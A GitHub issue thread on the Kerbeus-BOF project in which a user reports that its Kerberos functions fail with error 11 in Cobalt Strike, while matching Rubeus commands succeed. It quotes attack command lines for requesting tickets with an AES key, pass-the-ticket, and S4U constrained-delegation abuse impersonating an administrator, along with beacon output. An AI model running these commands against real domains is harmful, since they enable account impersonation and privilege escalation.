### ISSUE TITLE
most of the functionalities does not work

### ISSUE THREAD

**Issue by Chantal2019** [RalfHacker/Kerbeus-BOF#3]
Hey! first of all great tool!

So to be sure if it is the tool issue or not I tested some of the functionalities and it does not work for example the first one ( all tested were done in CS)

------krb_asktgt---------

Rubeus command ( Success) 👍

`execute-assembly Rubeus.exe asktgt /user:svc_wsus /aes256:ac34e2c3a61b51a3d4f4e119a220e13eb575bab477977802c1f8cad4ed89fdww /domain:test.local /ptt /nowrap`

`[+] Ticket successfully imported!`

---Kerbeus-BOF--- (Failed) 

`krb_asktgt /user:svc_wsus/aes256:ac34e2c3a61b51a3d4f4e119a220e13eb575bab477977802c1f8cad4ed89fdww /domain:test.local  /ptt`

`[12/27 21:46:05] [+] Kerbeus ASKTGT by RalfHacker
[12/27 21:46:05] [+] host called home, sent: 57065 bytes
[12/27 21:46:05] [+] received output:
[*] Action: Ask TGT

[*] Building AS-REQ (w/ preauth) for: 'test.local\svc_wsus'

	[x] Kerberos error : 11`

----Constrained Delegation-----

Rubeus command ( Success) 👍

`execute-assembly Rubeus.exe s4u /ticket: /impersonateuser:administrator /msdsspn:time/time.test.local /altservice:cifs,ldap,http,host /dc:dc.test.local /ptt`

`[+] Ticket successfully imported!`

---Kerbeus-BOF--- (Failed) 
`krb_s4u /service:time/time.test.local /impersonateuser:administrator/domain:test.local /dc:dc.test.local /ticket: /altservice:cifs,ldap,http,host /ptt

[*] Action: S4U

[*] Building S4U2self request for: 'svc_wsus@TEST.LOCAL'
[+] S4U2self success!
[*] Got a TGS for 'administrator' to 'svc_wsus@TEST.LOCAL'
[*] base64(ticket.kirbi):
`
`[*] Impersonating user 'administrator' to target SPN 'time/time.test.local'
[*]   Final tickets will be for the alternate services 'cifs,ldap,http,host'
[*] Building S4U2proxy request for service: 'time/time.test.local'

	[x] Kerberos error : 11`

**Comment by funnybananas** [comment]
I'm getting this same issue. Was this ever resolved?
